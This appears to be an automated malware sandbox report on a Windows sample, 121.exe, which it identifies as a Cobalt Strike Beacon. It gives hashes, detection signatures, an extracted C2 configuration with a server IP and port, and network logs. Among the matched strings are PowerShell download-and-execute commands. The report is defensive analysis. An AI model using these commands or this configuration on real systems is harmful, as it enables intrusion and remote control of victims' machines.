Windows Analysis Report
121.exe

Overview

General Information

Sample name: 121.exe
Analysis ID: 1581040
MD5: 3b8f4ae6dd1ef9625f8ba8f6c9eb8515
SHA1: d3dbc4f0348dce6c99dba536f8e86deb707be6ab
SHA256: f3ea334bb3adf2fabae612dd6155d15a05e5e1998a1d9d7b326e42ac4291c57e
Tags: CobaltStrike, exe, user-sicehicetf

Detection

CobaltStrike
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to detect sleep reduction / modifications
Found API chain indicative of debugger detection
Found potential dummy code loops (likely to delay analysis)
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 121.exe (PID: 5000 cmdline: "C:\Users\user\Desktop\121.exe" MD5: 3B8F4AE6DD1EF9625F8BA8F6C9EB8515)
  • cleanup
Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
Malware configuration (CobaltStrike):

{
  "BeaconType": ["HTTPS"],
  "Port": 60421,
  "SleepTime": 60000,
  "MaxGetSize": 1048576,
  "Jitter": 0,
  "C2Server": "152.42.226.16,/ca",
  "HttpPostUri": "/submit.php",
  "Malleable_C2_Instructions": [],
  "HttpGet_Verb": "GET",
  "HttpPost_Verb": "POST",
  "HttpPostChunk": 0,
  "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe",
  "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe",
  "CryptoScheme": 0,
  "Proxy_Behavior": "Use IE settings",
  "Watermark": 987654321,
  "bStageCleanup": "False",
  "bCFGCaution": "False",
  "KillDate": 0,
  "bProcInject_StartRWX": "True",
  "bProcInject_UseRWX": "True",
  "bProcInject_MinAllocSize": 0,
  "ProcInject_PrependAppend_x86": "Empty",
  "ProcInject_PrependAppend_x64": "Empty",
  "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"],
  "ProcInject_AllocationMethod": "VirtualAllocEx",
  "bUsesCookies": "True",
  "HostHeader": ""
}
Source | Rule | Description | Author | Strings
00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_2 | Yara detected CobaltStrike | Joe Security
00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security
00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_4 | Yara detected CobaltStrike | Joe Security
00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp | Windows_Trojan_CobaltStrike_ee756db7 | Attempts to detect Cobalt Strike based on strings found in BEACON | unknown
  • 0x30fa3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x3101b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x31780:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
  • 0x31ab2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
  • 0x31a44:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
  • 0x31ab2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
  • 0x3107e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x3120f:$a7: could not run command (w/ token) because of its length of %d bytes!
  • 0x310c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x31102:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
  • 0x31afc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
  • 0x3136a:$a11: Could not open service control manager on %s: %d
  • 0x3189c:$a12: %d is an x64 process (can't inject x86 content)
  • 0x318cc:$a13: %d is an x86 process (can't inject x64 content)
  • 0x31bed:$a14: Failed to impersonate logged on user %d (%u)
  • 0x31855:$a15: could not create remote thread in %d: %d
  • 0x31138:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x31803:$a17: could not write to process memory: %d
  • 0x3139b:$a18: Could not create service %s on %s: %d
  • 0x31424:$a19: Could not delete service %s on %s: %d
  • 0x31289:$a20: Could not open process token: %d (%u)
Source | Rule | Description | Author | Strings
0.2.121.exe.ce0000.2.raw.unpack | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security
0.2.121.exe.ce0000.2.raw.unpack | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
0.2.121.exe.ce0000.2.raw.unpack | Windows_Trojan_CobaltStrike_ee756db7 | Attempts to detect Cobalt Strike based on strings found in BEACON | unknown
  • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
  • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
  • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
  • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
  • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
  • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
  • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
  • 0x32d6a:$a11: Could not open service control manager on %s: %d
  • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
  • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
  • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
  • 0x33255:$a15: could not create remote thread in %d: %d
  • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
  • 0x33203:$a17: could not write to process memory: %d
  • 0x32d9b:$a18: Could not create service %s on %s: %d
  • 0x32e24:$a19: Could not delete service %s on %s: %d
  • 0x32c89:$a20: Could not open process token: %d (%u)
0.2.121.exe.ce0000.2.raw.unpack | Windows_Trojan_CobaltStrike_663fc95d | Identifies CobaltStrike via unidentified function code | unknown
  • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.121.exe.ce0000.2.raw.unpack | Windows_Trojan_CobaltStrike_f0b627fc | Rule for beacon reflective loader | unknown
  • 0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
  • 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-26T19:28:01.673606+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:07.561196+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:13.409204+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49710 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:19.377507+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49715 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:25.256835+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49727 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:31.327154+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49744 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:37.157879+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49758 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:43.783419+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49775 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:49.678477+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49789 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:28:55.588585+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49802 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:01.456300+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49821 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:07.535213+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49833 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:14.096183+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49850 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:19.931428+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49864 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:26.206541+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49877 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:32.159250+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49894 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:38.062491+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49908 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:44.081306+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49926 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:49.995684+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49942 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:29:55.909580+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49957 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:01.910442+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49974 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:07.860082+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49988 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:13.817298+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50005 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:19.803151+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50019 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:25.829058+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50035 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:31.881327+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50049 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:37.723474+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50054 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:43.582932+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50057 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:49.464020+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50060 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:30:55.445758+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50063 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:01.288625+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50066 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:07.098896+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50069 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:13.399828+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50072 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:19.241638+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50075 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:25.037680+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50078 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:30.865630+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50081 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:36.927590+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50084 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:42.740586+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50087 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:48.599640+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50090 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:31:54.641776+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50093 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:32:00.493646+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50096 | 152.42.226.16 | 60421 | TCP
2024-12-26T19:32:06.302485+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50099 | 152.42.226.16 | 60421 | TCP

              AV Detection

Source: 121.exe | Avira: detected
Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 60421, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "152.42.226.16,/ca", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
Source: 121.exe | ReversingLabs: Detection: 86%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 121.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00CE1184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00CE1184
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00CF9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_00CF9220
Source: C:\Users\user\Desktop\121.exe | Code function: 0_2_00CF1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00CF1C30
Source: C:\Users\user\Desktop\121.exe | Code function: 4x nop then sub rsp, 28h 0_2_00402314

              Networking

Source: Malware configuration extractor | URLs: 152.42.226.16
Source: global traffic | TCP traffic: 152.42.226.16 ports 0,1,2,4,6,60421
Source: global traffic | TCP traffic: 192.168.2.5:49704 -> 152.42.226.16:60421
Source: Joe Sandbox View | ASN Name: NCRENUS NCRENUS
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49707 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49715 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49704 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49744 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49710 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49789 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49775 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49758 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49877 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49894 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49850 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49942 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49957 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49908 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49821 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49974 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49988 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50019 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49802 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49864 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50035 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50049 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50057 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50063 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50054 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50069 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50072 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50081 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50078 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50075 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50093 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50099 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50066 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50087 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50084 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50060 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49727 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49833 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50090 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50096 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49926 -> 152.42.226.16:60421
Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50005 -> 152.42.226.16:60421
Source: unknown | TCP traffic detected without corresponding DNS query: 152.42.226.16 (this entry is repeated 50 times in the report, one per connection)
              Source: C:\Users\user\Desktop\121.exeCode function: 0_2_00CEE68C _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,0_2_00CEE68C
              Source: 121.exe, 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/
              Source: 121.exe, 00000000.00000002.4495724989.000000000008C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16/
              Source: 121.exe, 00000000.00000002.4495724989.000000000008C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16/8
              Source: 121.exe, 00000000.00000003.2726578993.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2364494903.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2607132749.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2548055513.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2517825725.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2758216720.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3151184537.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2454148896.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3477221868.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2245055221.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3210323568.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2665805385.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3329829025.0000000000127000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2635387413.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3238480994.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2213683301.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2972819737.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3060018775.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2331738304.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.3092041130.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 
00000000.00000003.3449261664.00000000000F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://152.42.226.16:60421/
Source: 121.exe, 00000000.00000003.2364494903.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2454148896.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2331738304.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2422827917.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2392522291.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2489074516.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2303817957.00000000000F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://152.42.226.16:60421/-
